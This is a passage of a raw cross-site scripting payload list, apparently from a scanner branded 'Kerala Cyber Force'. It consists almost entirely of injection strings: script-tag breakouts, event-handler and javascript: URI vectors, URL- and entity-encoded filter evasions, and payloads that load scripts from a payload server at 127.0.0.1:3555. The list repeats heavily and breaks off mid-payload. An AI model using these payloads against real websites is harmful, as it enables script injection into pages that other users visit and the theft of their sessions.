'</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>', '"><script>alert(String.fromCharCode(75,67,70))</script>', '</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>', "'><script>alert(String.fromCharCode(75,67,70))</script>", '</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>', '?/><script>prompt(1)</script>', '</ScrIpt><script>prompt(1)</script>', '"><script>prompt(1)</script>', '</ScrIpt><script>prompt(1)</script>', "'><script>prompt(1)</script>", '</ScrIpt><script>prompt(1)</script>', '?/><script>alert(String.fromCharCode(75,67,70))</script>', '</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>', '"><script>alert(String.fromCharCode(75,67,70))</script>', '</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>', "'><script>alert(String.fromCharCode(75,67,70))</script>", '</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>', '?/><script>prompt(1)</script>', '</ScrIpt><script>prompt(1)</script>', '"><script>prompt(1)</script>', '</ScrIpt><script>prompt(1)</script>', "'><script>prompt(1)</script>", '</ScrIpt><script>prompt(1)</script>', '?/><script>alert(String.fromCharCode(75,67,70))</script>', '</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>', '"><script>alert(String.fromCharCode(75,67,70))</script>', '</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>', "'><script>alert(String.fromCharCode(75,67,70))</script>", '</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>', '</SCRIPT>?><SCRIPT>prompt(1)</SCRIPT>', '"></SCRIPT>?><SCRIPT>prompt(1)</SCRIPT>', "'></SCRIPT>?><SCRIPT>prompt(1)</SCRIPT>", '</SCRIPT>?><SCRIPT>alert(String.fromCharCode(75,67,70))', '"></SCRIPT>?><SCRIPT>alert(String.fromCharCode(75,67,70))', "'></SCRIPT>?><SCRIPT>alert(String.fromCharCode(75,67,70))", '</SCRIPT>?>?><SCRIPT>prompt(1)</SCRIPT>', '"></SCRIPT>?>?><SCRIPT>prompt(1)</SCRIPT>', "'></SCRIPT>?>?><SCRIPT>prompt(1)</SCRIPT>", 
'</SCRIPT>?>?><SCRIPT>alert(String.fromCharCode(75,67,70))</SCRIPT>', '"></SCRIPT>?>?><SCRIPT>alert(String.fromCharCode(75,67,70))</SCRIPT>', "'></SCRIPT>?>?><SCRIPT>alert(String.fromCharCode(75,67,70))</SCRIPT>", '%27%3E%3C%73%63%72%69%70%74%3E%4B%43%46%3C%2F%73%63%72%69%70%74%3E', '%22%3E%3C%73%63%72%69%70%74%3E%4B%43%46%3C%2F%73%63%72%69%70%74%3E', '%25%32%37%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45%25%34%42%25%34%33%25%34%36%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', '%25%32%32%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45%25%34%42%25%34%33%25%34%36%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', '%25%32%35%25%33%32%25%33%32%25%32%35%25%33%33%25%34%35%25%32%35%25%33%33%25%34%33%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%39%25%32%35%25%33%37%25%33%30%25%32%35%25%33%37%25%33%34%25%32%35%25%33%33%25%34%35%25%32%35%25%33%34%25%34%32%25%32%35%25%33%34%25%33%33%25%32%35%25%33%34%25%33%36%25%32%35%25%33%33%25%34%33%25%32%35%25%33%32%25%34%36%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%39%25%32%35%25%33%37%25%33%30%25%32%35%25%33%37%25%33%34%25%32%35%25%33%33%25%34%35', '<h1>X</h1>', '"><h1>X</h1>', "'><h1>X</h1>", '<marquee>Kerala Cyber Force</marquee>', '"><marquee>Kerala Cyber Force</marquee>', "'><marquee>Kerala Cyber Force</marquee>", '<br><br><b><u>X</u></b>', '"><br><br><b><u>X</u></b>', "'><br><br><b><u>X</u></b>", '<script>window.open( "http://127.0.0.1:3555/xss_serve_payloads/X.html" )</script>', '</ScrIpt><script>window.open( "http://127.0.0.1:3555/xss_serve_payloads/X.html" )</script>', '"><script>window.open( "http://127.0.0.1:3555/xss_serve_payloads/X.html" )</script>', '</ScrIpt><script>window.open( "http://127.0.0.1:3555/xss_serve_payloads/X.html" )</script>', '\'><script>window.open( 
"http://127.0.0.1:3555/xss_serve_payloads/X.html" )</script>', '</ScrIpt><script>window.open( "http://127.0.0.1:3555/xss_serve_payloads/X.html" )</script>', '<script>alert%281%29</script>', '</ScrIpt><script>alert%281%29</script>', '"><script>alert%281%29</script>', '</ScrIpt><script>alert%281%29</script>', "'><script>alert%281%29</script>", '</ScrIpt><script>alert%281%29</script>', '<script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>/', '</ScrIpt><script>alert(1)</script>/', '"><script>alert(1)</script>/', '</ScrIpt><script>alert(1)</script>/', "'><script>alert(1)</script>/", '</ScrIpt><script>alert(1)</script>/', '<script%20language=vbscript>msgbox%20X</script>', '"><script%20language=vbscript>msgbox%20X</script>', "'><script%20language=vbscript>msgbox%20X</script>", '></title><script>alert(X)</script>\'"><marquee><h1>Kerala Cyber Force</h1></marquee>', '<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '</ScrIpt><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '"><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '</ScrIpt><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '\'><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '</ScrIpt><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>', '<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '</ScrIpt><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '"><SCRIPT>document.write("<SCRI");</SCRIPT>PT 
SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '</ScrIpt><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '\'><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '</ScrIpt><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>', '?;!?<SCRIPT>alert(String.fromCharCode(75,67,70))</SCRIPT>=&{}', '!?<SCRIPT>alert(String.fromCharCode(75,67,70))</SCRIPT>=&{}', '<img src="blah"onmouseover="alert(1);">', '"><img src="blah"onmouseover="alert(1);">', '\'><img src="blah"onmouseover="alert(1);">', '<img src="blah>" onmouseover="alert(1);">', '"><img src="blah>" onmouseover="alert(1);">', '\'><img src="blah>" onmouseover="alert(1);">', '<IMG SRC="javascript:alert(1);"', '"><IMG SRC="javascript:alert(1);"', '\'><IMG SRC="javascript:alert(1);">', '"><IMG SRC="javascript:alert(1);"', '"><IMG SRC="javascript:alert(1);"', '\'><IMG SRC="javascript:alert(1);">', '\'><IMG SRC="javascript:alert(1);"', '"><IMG SRC="javascript:alert(1);"', '\'><IMG SRC="javascript:alert(1);">', '<IMG SRC="javascript:alert(1);"', '"><IMG SRC="javascript:alert(1);"', '\'><IMG SRC="javascript:alert(1);"', '<IMG SRC=javascript:alert(1)>', '"><IMG SRC=javascript:alert(1)>', "'><IMG SRC=javascript:alert(1)>", '<IMG SRC=JaVaScRiPt:alert(1)>', '"><IMG SRC=JaVaScRiPt:alert(1)>', "'><IMG SRC=JaVaScRiPt:alert(1)>", '</TITLE><SCRIPT>alert(1);</SCRIPT>', '</ScrIpt><SCRIPT>alert(1);</SCRIPT>', '"><SCRIPT>alert(1);</SCRIPT>', '</ScrIpt><SCRIPT>alert(1);</SCRIPT>', "'><SCRIPT>alert(1);</SCRIPT>", '</ScrIpt><SCRIPT>alert(1);</SCRIPT>', '"></TITLE><SCRIPT>alert(1);</SCRIPT>', '</ScrIpt><SCRIPT>alert(1);</SCRIPT>', '"><SCRIPT>alert(1);</SCRIPT>', '</ScrIpt><SCRIPT>alert(1);</SCRIPT>', "'><SCRIPT>alert(1);</SCRIPT>", '</ScrIpt><SCRIPT>alert(1);</SCRIPT>', "'></TITLE><SCRIPT>alert(1);</SCRIPT>", 
'</ScrIpt><SCRIPT>alert(1);</SCRIPT>', '"><SCRIPT>alert(1);</SCRIPT>', '</ScrIpt><SCRIPT>alert(1);</SCRIPT>', "'><SCRIPT>alert(1);</SCRIPT>", '</ScrIpt><SCRIPT>alert(1);</SCRIPT>', '<IMG SRC=javascript:alert("X")>', '"><IMG SRC=javascript:alert("X")>', "'><IMG SRC=javascript:alert("X")>", '<IMG SRC=`javascript:alert("Kerala Cyber Force, \'X\'")`>', '"><IMG SRC=`javascript:alert("Kerala Cyber Force, \'X\'")`>', '\'><IMG SRC=`javascript:alert("Kerala Cyber Force, \'X\'")`>', '<IMG """><SCRIPT>alert(1)</SCRIPT>">', '"><IMG """><SCRIPT>alert(1)</SCRIPT>">', '\'><IMG """><SCRIPT>alert(1)</SCRIPT>">', '<img/src="1"/onerror="alert(1)"', '"><img/src="1"/onerror="alert(1)"', '\'><img/src="1"/onerror="alert(1)"', 'SCRIPT>">\'><SCRIPT>alert(String.fromCharCode(75,67,70))</SCRIPT>', '<IMG SRC=javascript:alert(String.fromCharCode(75,67,70))>', '"><IMG SRC=javascript:alert(String.fromCharCode(75,67,70))>', "'><IMG SRC=javascript:alert(String.fromCharCode(75,67,70))>", '<IMG SRC="jav\tascript:alert(1);">', '"><IMG SRC="jav\tascript:alert(1);">', '\'><IMG SRC="jav\tascript:alert(1);">', '<IMG SRC="jav	ascript:alert(1);">', '"><IMG SRC="jav	ascript:alert(1);">', '\'><IMG SRC="jav	ascript:alert(1);">', '<IMG SRC="jav
ascript:alert(1);">', '"><IMG SRC="jav
ascript:alert(1);">', '\'><IMG SRC="jav
ascript:alert(1);">', '<IMG SRC="jav
ascript:alert(1);">', '"><IMG SRC="jav
ascript:alert(1);">', '\'><IMG SRC="jav
ascript:alert(1);">', '<IMG SRC="  javascript:alert(1);">', '"><IMG SRC="  javascript:alert(1);">', '\'><IMG SRC="  javascript:alert(1);">', '<script>prompt(1)</script>', '</ScrIpt><script>prompt(1)</script>', '"><script>prompt(1)</script>', '</ScrIpt><script>prompt(1)</script>', "'><script>prompt(1)</script>", '</ScrIpt><script>prompt(1)</script>', '<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(1)>', '"><BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(1)>', "'><BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(1)>", '<body onload="alert(1);">', '"><body onload="alert(1);">', '\'><body onload="alert(1);">', '<body onload="alert(1)">', '"><body onload="alert(1)">', '\'><body onload="alert(1)">', '<img src="javascript:alert(1)">', '"><img src="javascript:alert(1)">', '\'><img src="javascript:alert(1)">', '<p style="background:url(\'javascript:alert(1)\')">', '"><p style="background:url(\'javascript:alert(1)\')">', '\'><p style="background:url(\'javascript:alert(1)\')">', '\' style=abc:expression(X) \' \\" style=abc:expression(X) \\"', '" type=image src=null onerror=X " \\\' type=image src=null onerror=X \\\'', 'onload=\'X\' \\" onload=\\"X\\"/onload=\\"X\\"/onload=\'X\'/', '\\\'\\"<\\/script><\\/xml><\\/title><\\/textarea><\\/noscript><\\/style><\\/listing><\\/xmp><\\/pre><img src=null onerror=X>', '<<scr\\0ipt/src=http://127.0.0.1:3555/xss_serve_payloads/X.js></script', '"><<scr\\0ipt/src=http://127.0.0.1:3555/xss_serve_payloads/X.js></script', "'><<scr\\0ipt/src=http://127.0.0.1:3555/xss_serve_payloads/X.js></script", '<<scr\\0ipt/src=http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp></script', '"><<scr\\0ipt/src=http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp></script', "'><<scr\\0ipt/src=http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp></script", '<img src="x:gif" onerror="window[\'al\\u0065rt\'](1)"></img>', '"><img src="x:gif" onerror="window[\'al\\u0065rt\'](1)"></img>', '\'><img src="x:gif" onerror="window[\'al\\u0065rt\'](1)"></img>', '<img src="x:gif" 
onerror="eval(\'al\'%2b\'lert(1)\')">', '"><img src="x:gif" onerror="eval(\'al\'%2b\'lert(1)\')">', '\'><img src="x:gif" onerror="eval(\'al\'%2b\'lert(1)\')">', '<img src="x:alert" onerror="eval(src%2b\'(1)\')">', '"><img src="x:alert" onerror="eval(src%2b\'(1)\')">', '\'><img src="x:alert" onerror="eval(src%2b\'(1)\')">', '<img/src="mars.png"alt="mars">', '"><img/src="mars.png"alt="mars">', '\'><img/src="mars.png"alt="mars">', '<object data="javascript:alert(1)">', '"><object data="javascript:alert(1)">', '\'><object data="javascript:alert(1)">', '<isindex type=image src=1 onerror=alert(1)>', '"><isindex type=image src=1 onerror=alert(1)>', "'><isindex type=image src=1 onerror=alert(1)>", '<isindex action=javascript:alert(1) type=image>', '"><isindex action=javascript:alert(1) type=image>', "'><isindex action=javascript:alert(1) type=image>", '<img src=x:alert(alt) onerror=eval(src) alt=0>', '"><img src=x:alert(alt) onerror=eval(src) alt=0>', "'><img src=x:alert(alt) onerror=eval(src) alt=0>", '<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(1);</x:script>', '"><x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(1);</x:script>', '\'><x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(1);</x:script>', '<img src=foo.png onerror=%61%6C%65%72%74%28%2F%4B%43%46%2F%29/>', '"><img src=foo.png onerror=%61%6C%65%72%74%28%2F%4B%43%46%2F%29/>', "'><img src=foo.png onerror=%61%6C%65%72%74%28%2F%4B%43%46%2F%29/>", '";location=\'javascript:alert(1)\';', '";location=location.hash)//#0={};alert(1)', '";eval(unescape(location))//#%0Aalert(1)', '<b/alt="1"onmouseover=InputBox+1language=vbs>X</b>', '"><b/alt="1"onmouseover=InputBox+1language=vbs>X</b>', '\'><b/alt="1"onmouseover=InputBox+1language=vbs>X</b>', '<b "<script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>">X</b>', '</a onmousemove="alert(1)">', '"></a 
onmousemove="alert(1)">', '\'></a onmousemove="alert(1)">', 'data:text/html,<script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>', '<img src="x:?" title="onerror=alert(1)//">', '"><img src="x:?" title="onerror=alert(1)//">', '\'><img src="x:?" title="onerror=alert(1)//">', '<img src="x:? title=" onerror=alert(1)//">', '"><img src="x:? title=" onerror=alert(1)//">', '\'><img src="x:? title=" onerror=alert(1)//">', '?script?alert(?X?)?/script?', '<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(1);">', '"><META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(1);">', '\'><META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(1);">', '<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">', '"><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">', '\'><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">', '<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(1);">', '"><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(1);">', '\'><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(1);">', '<DIV STYLE="background-image: url(javascript:alert(1))">', '"><DIV STYLE="background-image: url(javascript:alert(1))">', '\'><DIV STYLE="background-image: url(javascript:alert(1))">', '<div style="background-image: url(javascript:alert(1););">', '"><div style="background-image: url(javascript:alert(1););">', '\'><div style="background-image: url(javascript:alert(1););">', '<DIV STYLE="background-image: url(javascript:alert(1))">', '"><DIV STYLE="background-image: url(javascript:alert(1))">', '\'><DIV STYLE="background-image: url(javascript:alert(1))">', '<div style="behaviour: 
url(http://127.0.0.1:3555/xss_serve_payloads/X.html);">', '"><div style="behaviour: url(http://127.0.0.1:3555/xss_serve_payloads/X.html);">', '\'><div style="behaviour: url(http://127.0.0.1:3555/xss_serve_payloads/X.html);">', '<div style="binding: url(http://127.0.0.1:3555/xss_serve_payloads/X.html));">', '"><div style="binding: url(http://127.0.0.1:3555/xss_serve_payloads/X.html));">', '\'><div style="binding: url(http://127.0.0.1:3555/xss_serve_payloads/X.html));">', '<div style="behaviour: url(\'http://127.0.0.1:3555/xss_serve_payloads/X.html\');">', '"><div style="behaviour: url(\'http://127.0.0.1:3555/xss_serve_payloads/X.html\');">', '\'><div style="behaviour: url(\'http://127.0.0.1:3555/xss_serve_payloads/X.html\');">', '<div style="binding: url("http://127.0.0.1:3555/xss_serve_payloads/X.html"));">', '"><div style="binding: url("http://127.0.0.1:3555/xss_serve_payloads/X.html"));">', '\'><div style="binding: url("http://127.0.0.1:3555/xss_serve_payloads/X.html"));">', '<SCRIPT <B>alert(1);</SCRIPT>', '"><SCRIPT <B>alert(1);</SCRIPT>', "'><SCRIPT <B>alert(1);</SCRIPT>", '<<SCRIPT>alert(1);/', '"><<SCRIPT>alert(1);/', "'><<SCRIPT>alert(1);//<</SCRIPT>", '"><<SCRIPT>alert(1);//<</SCRIPT>', "'><<SCRIPT>alert(1);//<</SCRIPT>", '<<script>alert(1);</script>', '"><<script>alert(1);</script>', "'><<script>alert(1);</script>", '</ScrIpt><script>alert(1);</script>', '"><script>alert(1);</script>', '</ScrIpt><script>alert(1);</script>', "'><script>alert(1);</script>", '</ScrIpt><script>alert(1);</script>', '<INPUT TYPE="IMAGE" SRC="javascript:alert(1);">', '"><INPUT TYPE="IMAGE" SRC="javascript:alert(1);">', '\'><INPUT TYPE="IMAGE" SRC="javascript:alert(1);">', '<IMG SRC="javascript:alert(1)"', '"><IMG SRC="javascript:alert(1)"', '\'><IMG SRC="javascript:alert(1)"', '<iframe src=http://127.0.0.1:3555/xss_serve_payloads/X.html <', '"><iframe src=http://127.0.0.1:3555/xss_serve_payloads/X.html <', "'><iframe src=http://127.0.0.1:3555/xss_serve_payloads/X.html <", 
'<SCRIPT>a=/X/', '</ScrIpt><SCRIPT>a=/X/', '"><SCRIPT>a=/X/', '</ScrIpt><SCRIPT>a=/X/', "'><SCRIPT>a=/X/", '</ScrIpt><SCRIPT>a=/X/alert(a.source)</SCRIPT>', '</ScrIpt><SCRIPT>a=/X/alert(a.source)</SCRIPT>', '"><SCRIPT>a=/X/alert(a.source)</SCRIPT>', '</ScrIpt><SCRIPT>a=/X/alert(a.source)</SCRIPT>', "'><SCRIPT>a=/X/alert(a.source)</SCRIPT>", '</ScrIpt><SCRIPT>a=/X/alert(a.source)</SCRIPT>', '\\";alert(1);//', '<input onfocus=javascript:alert(1) autofocus>', '"><input onfocus=javascript:alert(1) autofocus>', "'><input onfocus=javascript:alert(1) autofocus>", '<select onfocus=javascript:alert(1) autofocus>', '"><select onfocus=javascript:alert(1) autofocus>', "'><select onfocus=javascript:alert(1) autofocus>", '<textarea onfocus=javascript:alert(1) autofocus>', '"><textarea onfocus=javascript:alert(1) autofocus>', "'><textarea onfocus=javascript:alert(1) autofocus>", '<keygen onfocus=javascript:alert(1) autofocus>', '"><keygen onfocus=javascript:alert(1) autofocus>', "'><keygen onfocus=javascript:alert(1) autofocus>", '<input autofocus onfocus=alert(1)>', '"><input autofocus onfocus=alert(1)>', "'><input autofocus onfocus=alert(1)>", '<iframe/ /onload=alert(1)></iframe>', '"><iframe/ /onload=alert(1)></iframe>', "'><iframe/ /onload=alert(1)></iframe>", '<iframe/ "onload=alert(1)></iframe>', '"><iframe/ "onload=alert(1)></iframe>', '\'><iframe/ "onload=alert(1)></iframe>', '<iframe///////onload=alert(1)></iframe>', '"><iframe///////onload=alert(1)></iframe>', "'><iframe///////onload=alert(1)></iframe>", '<iframe "onload=alert(1)></iframe>', '"><iframe "onload=alert(1)></iframe>', '\'><iframe "onload=alert(1)></iframe>', '<iframe<?php echo chr(11)?> onload=alert(1)></iframe>', '"><iframe<?php echo chr(11)?> onload=alert(1)></iframe>', "'><iframe<?php echo chr(11)?> onload=alert(1)></iframe>", '<iframe<?php echo chr(12)?> onload=alert(1)></iframe>', '"><iframe<?php echo chr(12)?> onload=alert(1)></iframe>', "'><iframe<?php echo chr(12)?> onload=alert(1)></iframe>", 
'<ScRIPT x src=//0x.lv?</style></script><script>alert(String.fromCharCode(75,67,70))</script>', '"></script><script>alert(String.fromCharCode(75,67,70))</script>', "'></script><script>alert(String.fromCharCode(75,67,70))</script>", '</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>', '"><script>alert(String.fromCharCode(75,67,70))</script>', '</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>', "'><script>alert(String.fromCharCode(75,67,70))</script>", '</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script><script src=http://127.0.0.1:3555/xss_serve_payloads/X.js>', '<ScRIPT x src=//0x.lv?</style></script><script>alert(String.fromCharCode(75,67,70))</script>', '"></script><script>alert(String.fromCharCode(75,67,70))</script>', "'></script><script>alert(String.fromCharCode(75,67,70))</script>", '</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>', '"><script>alert(String.fromCharCode(75,67,70))</script>', '</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script>', "'><script>alert(String.fromCharCode(75,67,70))</script>", '</ScrIpt><script>alert(String.fromCharCode(75,67,70))</script><script src=http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp>', '</script><script>alert(X', '"></script><script>alert(X', "'></script><script>alert(X", '%7D%3C/style%3E43%27%22%3E%3C/title%3E%3Cscript%3Ea=eval;b=alert;a(b(/X/.source));%3C/script%3E%27%22%3E%3Cmarquee%3E%3Ch1%3EX%3C/h1%3E%3C/marquee%3E', '<script>alert("KCF")</script>', '<FRAMESET><FRAME SRC="javascript:alert(1);"></FRAMESET>', '"><FRAMESET><FRAME SRC="javascript:alert(1);"></FRAMESET>', '\'><FRAMESET><FRAME SRC="javascript:alert(1);"></FRAMESET>', "')alert(1);", '");alert(1);', '?;alert(?X?);?', '?;alert(String.fromCharCode(75,67,70));?', '?;alert(?X?);?', '?;alert(String.fromCharCode(75,67,70));?', '?;alert(?X?)', '?;alert(String.fromCharCode(75,67,70))', '?;alert(?X?)', '?;alert(String.fromCharCode(75,67,70))', '<script>var var = 1; alert(var)</script>', 
'</ScrIpt><script>var var = 1; alert(var)</script>', '"><script>var var = 1; alert(var)</script>', '</ScrIpt><script>var var = 1; alert(var)</script>', "'><script>var var = 1; alert(var)</script>", '</ScrIpt><script>var var = 1; alert(var)</script>', '<script type=text/javascript>alert(1)</script>', '"><script type=text/javascript>alert(1)</script>', "'><script type=text/javascript>alert(1)</script>", '?><script >alert(1)</script>', '<iframe src="http://127.0.0.1:3555/xss_serve_payloads/X.html" width="800" height="800">iframe</iframe>', '"><iframe src="http://127.0.0.1:3555/xss_serve_payloads/X.html" width="800" height="800">iframe</iframe>', '\'><iframe src="http://127.0.0.1:3555/xss_serve_payloads/X.html" width="800" height="800">iframe</iframe>', '<IMG SRC=`javascript:alert(?X says, ?X??)`>', '"><IMG SRC=`javascript:alert(?X says, ?X??)`>', "'><IMG SRC=`javascript:alert(?X says, ?X??)`>", '<img src = ?http://127.0.0.1:3555/xss_serve_payloads/X.js?>', '"><img src = ?http://127.0.0.1:3555/xss_serve_payloads/X.js?>', "'><img src = ?http://127.0.0.1:3555/xss_serve_payloads/X.js?>", '<img src = ?http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp?>', '"><img src = ?http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp?>', "'><img src = ?http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp?>", '<A HREF="//127.0.0.1:3555/xss_serve_payloads/X.html">X</A>', '"><A HREF="//127.0.0.1:3555/xss_serve_payloads/X.html">X</A>', '\'><A HREF="//127.0.0.1:3555/xss_serve_payloads/X.html">X</A>', '<A HREF="http://127.0.0.1:3555/xss_serve_payloads/X.html./">X</A>', '"><A HREF="http://127.0.0.1:3555/xss_serve_payloads/X.html./">X</A>', '\'><A HREF="http://127.0.0.1:3555/xss_serve_payloads/X.html./">X</A>', '<A HREF="javascript:document.location=\'http://127.0.0.1:3555/xss_serve_payloads/X.html\'">X</A>', '"><A HREF="javascript:document.location=\'http://127.0.0.1:3555/xss_serve_payloads/X.html\'">X</A>', '\'><A 
HREF="javascript:document.location=\'http://127.0.0.1:3555/xss_serve_payloads/X.html\'">X</A>', '<IMG SRC=javascript:alert('KCF');>', '"><IMG SRC=javascript:alert('KCF');>', "'><IMG SRC=javascript:alert('KCF');>", '<IMG SRC=javascript:alert('XSS')>', '"><IMG SRC=javascript:alert('XSS')>', "'><IMG SRC=javascript:alert('XSS')>", '<IMG SRC=javascript:alert('XSS')>', '"><IMG SRC=javascript:alert('XSS')>', "'><IMG SRC=javascript:alert('XSS')>", '<DIV STYLE="background-image:\\0075\\0072\\006C\\0028\'\\006a\\0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\006c\\0065\\0072\\0074\\0028.1027\\0058.1053\\0053\\0027\\0029\'\\0029">', '"><DIV STYLE="background-image:\\0075\\0072\\006C\\0028\'\\006a\\0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\006c\\0065\\0072\\0074\\0028.1027\\0058.1053\\0053\\0027\\0029\'\\0029">', '\'><DIV STYLE="background-image:\\0075\\0072\\006C\\0028\'\\006a\\0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\006c\\0065\\0072\\0074\\0028.1027\\0058.1053\\0053\\0027\\0029\'\\0029">', '?><s?%2b?cript>alert(1)</script>', '?><ScRiPt>alert(1)</script>', '?><<script>alert(1);//<</script>', 'foo%00<script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>', '<scr<script>ipt>alert(1)</scr</script>ipt>', '"><scr<script>ipt>alert(1)</scr</script>ipt>', "'><scr<script>ipt>alert(1)</scr</script>ipt>", '\';alert(String.fromCharCode(75,67,70))//\\\';alert(String.fromCharCode(75,67,70))//";alert(String.fromCharCode(75,67,70))//\\";alert(String.fromCharCode(75,67,70))//--></SCRIPT>">\'><SCRIPT>alert(String.fromCharCode(75,67,70))</SCRIPT>', 
'\';alert(String.fromCharCode(75,67,70))//\\\';alert(String.fromCharCode(75,67,70))//";alert(String.fromCharCode(75,67,70))//\\";alert(String.fromCharCode(75,67,70))//--></SCRIPT>">\'><SCRIPT>alert(String.fromCharCode(75,67,70))</SCRIPT>=&{}', '\'\';!--"<X>=&{()}', '<IMG SRC="javascript:alert(1);">', '<IMG SRC=javascript:alert(1)>', '<IMG SRC=JaVaScRiPt:alert(1)>', '<IMG SRC=javascript:alert(&quot;X&quot;)>', '<IMG SRC=`javascript:alert("Kerala Cyber Force says, \'X\'")`>', '<IMG """><SCRIPT>alert(1)</SCRIPT>">', '<IMG SRC=javascript:alert(String.fromCharCode(75,67,70))>', '<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>', '<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>', '<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>', '<IMG SRC="jav	ascript:alert(1);">', '<IMG SRC="jav&#x09;ascript:alert(1);">', '<IMG SRC="jav&#x0A;ascript:alert(1);">', '<IMG SRC="jav&#x0D;ascript:alert(1);">', '<IMG SRC=`javascript:alert(1)`>', '"><IMG SRC=`javascript:alert(1)`>', "'><IMG SRC=`javascript:alert(1)`>", '<IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
